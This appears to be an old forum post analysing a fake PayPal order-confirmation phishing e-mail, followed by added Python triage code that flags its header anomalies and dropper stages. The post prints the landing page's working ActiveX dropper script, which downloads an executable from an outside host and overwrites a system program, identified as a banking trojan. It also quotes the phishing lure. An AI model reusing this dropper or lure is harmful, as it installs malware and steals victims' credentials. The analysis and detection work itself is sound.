Online invoice: Paypal



KyroxX
30.01.2005, 14:09
Hello everyone:
Message:
From - Sun Jan 30 xx:xx:xx 2005
X-Account-Key: account2
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <piteshman [at] shop.com>
Delivered-To: *********@dd2004.kasserver.com
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
by dd2004.kasserver.com (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 29 Jan 2005 xx:xx:xx +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
by UserMail1.FreeCity.De (Postfix) with SMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 29 Jan 2005 xx:xx:xx +0100 (CET)
X-Message-Info: V/km+3+td/F+42/444321127952331
Received: from smtp-credenza.areaway.piteshman [at] shop.com ([]) by g270-wvi9.piteshman [at] shop.com with Microsoft SMTPSVC(5.0.5203.4611);
Sun, 30 Jan 2005 xx:xx:xx -0500
Received: from smtp-pensive.florid.piteshman [at] shop.com ([]) by bv57-cg32.piteshman [at] shop.com with Microsoft SMTPSVC(5.0.2333.6235);
Sun, 30 Jan 2005 xx:xx:xx +0400
X-Message-Info: NCDZ+%ND_LC_CHAR[1-3]7+ie+NDW+482/198368156710
Received: (qmail 41314 invoked by UID: [UID filtered]
Date: Sun, 30 Jan 2005 xx:xx:xx -0700
Message-ID: [ID filtered]
From: PayPal Support <piteshman [at] shop.com>
To: Info <poor [at] spamvictim.tld>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0 (produced by francesanew 7.4)
Content-Type: multipart/alternative;
boundary="--206346472488856940"
X-UIDL: [UID filtered]
----206346472488856940
Content-Type: text/html;
charset="iso-5877-2"
Content-Transfer-Encoding: 7Bit
Content-Description: cicada avocet alkaloid
Sony DSC-F828 8.0MP Digital Camera<br><br>

Your order # 12405 has been accepted for the amount 840.00$ <br>
Your card will be charged in that amount .Thank you for your purchase.<br><br><br>


You can check the order in your profile. <br><br>
http://jeysiksnet.net
----206346472488856940--
When the link is followed, an iframe is loaded which, on redirect to a page, opens javascript_loader.js.
This in turn executes shellcode.js. Code:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://jeysiksnet.netfirms.com/demo.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";
I analysed demo.exe:
TrojanSpy.Win32.Banker.bq
It presumably logs the PayPal login credentials and sends them home.
Regards
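The message quoted above shows the classic indicators of a brand-impersonation phish: a "PayPal Support" display name on an unrelated sender domain, a delivering host that has nothing to do with that domain, Received headers with empty address literals and hostnames containing "@", a charset that does not exist, and a body link pointing at yet another domain, followed by an ActiveX fetch/write/launch chain in the landing page. The following Python is an added triage example, not code from the post or from any of the products named in it. The sample message is a trimmed reconstruction of the headers quoted in the post, the dropper snippet is a cut-down constructed stand-in with a placeholder URL, and the BRAND_DOMAINS mapping is an assumption used for the display-name check:

```python
"""Phishing triage helpers: header heuristics plus a stage signature for the
ActiveX download-and-drop chain. Added example; sample data is constructed."""
import codecs
import re
from email import message_from_string
from email.utils import parseaddr

# Display-name brands and the sending domains we accept for them (assumption:
# paypal.com is the brand's own domain; extend for your environment).
BRAND_DOMAINS = {"paypal": {"paypal.com"}}

# Constructed sample: the headers quoted in the post, trimmed to what the checks use.
SAMPLE_MAIL = """\
Return-Path: <piteshman@shop.com>
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
    by UserMail1.FreeCity.De (Postfix) with SMTP id 000
Received: from smtp-credenza.areaway.piteshman@shop.com ([]) by g270-wvi9.piteshman@shop.com with Microsoft SMTPSVC(5.0.5203.4611);
From: PayPal Support <piteshman@shop.com>
To: Info <poor@spamvictim.tld>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0
Content-Type: text/html; charset="iso-5877-2"

Your order # 12405 has been accepted for the amount 840.00$<br>
You can check the order in your profile.<br>
<a href="http://jeysiksnet.net">http://jeysiksnet.net</a>
"""

# Constructed, deliberately incomplete stand-in for the dropper quoted in the post.
SAMPLE_SCRIPT = """\
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://dropper.invalid/payload.exe", 0);
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile("C:\\\\placeholder\\\\path.exe", 2);
location.href = "mms://";
"""


def _domain(addr: str) -> str:
    """Domain part of an e-mail address, lowercased ('' if there is none)."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def header_indicators(raw: str) -> list[str]:
    """Return human-readable phishing indicators found in a raw RFC 822 message."""
    msg = message_from_string(raw)
    findings: list[str] = []

    # 1. Brand in the display name, but the sender domain is not the brand's.
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = _domain(addr)
    for brand, domains in BRAND_DOMAINS.items():
        if brand in name.lower() and sender_domain not in domains:
            findings.append(f"display name claims {brand!r} but sender domain is {sender_domain!r}")

    # 2. A charset no decoder knows is a mailer fingerprint, not a real encoding.
    charset = msg.get_content_charset()
    if charset:
        try:
            codecs.lookup(charset)
        except LookupError:
            findings.append(f"unknown charset {charset!r} (spam-tool fingerprint)")

    # 3. Received chain: empty address literals or '@' in a hostname are forged;
    #    otherwise compare the delivering host's reverse name with the sender domain.
    for hop in msg.get_all("Received", []):
        flat = " ".join(hop.split())
        if "([])" in flat or re.search(r"\bfrom\s+\S*@", flat):
            findings.append(f"malformed Received hop: {flat[:50]}")
            continue
        m = re.search(r"\(([\w.-]+)\s+\[\d", flat)
        if m and not m.group(1).lower().endswith(sender_domain):
            findings.append(f"delivering host {m.group(1)!r} unrelated to sender domain {sender_domain!r}")

    # 4. Body links that lead to a domain the sender does not own.
    if msg.get_content_type() == "text/html":
        body = (msg.get_payload(decode=True) or b"").decode("latin-1", "replace")
        for host in sorted(set(re.findall(r'https?://([^/"\s<>]+)', body))):
            if not host.lower().endswith(sender_domain):
                findings.append(f"link host {host!r} does not belong to sender domain {sender_domain!r}")
    return findings


# Stage signature for the ActiveX chain: fetch over XMLHTTP, buffer through
# ADODB.Stream, write the buffer to disk, then hand off to a protocol handler.
DROPPER_STAGES = {
    "fetch": re.compile(r"ActiveXObject\(\s*[\"']Microsoft\.XMLHTTP[\"']", re.I),
    "buffer": re.compile(r"ActiveXObject\(\s*[\"']ADODB\.Stream[\"']", re.I),
    "drop": re.compile(r"\.SaveToFile\s*\(", re.I),
    "launch": re.compile(r"location\.href\s*=\s*[\"']\w+:", re.I),
}


def script_indicators(js: str) -> list[str]:
    """Return the dropper stages present in a script; several together is the verdict."""
    return [stage for stage, rx in DROPPER_STAGES.items() if rx.search(js)]


if __name__ == "__main__":
    for finding in header_indicators(SAMPLE_MAIL):
        print("-", finding)
    print("dropper stages:", script_indicators(SAMPLE_SCRIPT))
```

Each check is deliberately independent so a single hit stays a weak signal while the combination seen here (brand mismatch, bogus charset, forged hops, off-domain link) is a strong one; the script signature is keyed on the co-occurrence of stages rather than on any URL or file name, since those change between campaigns.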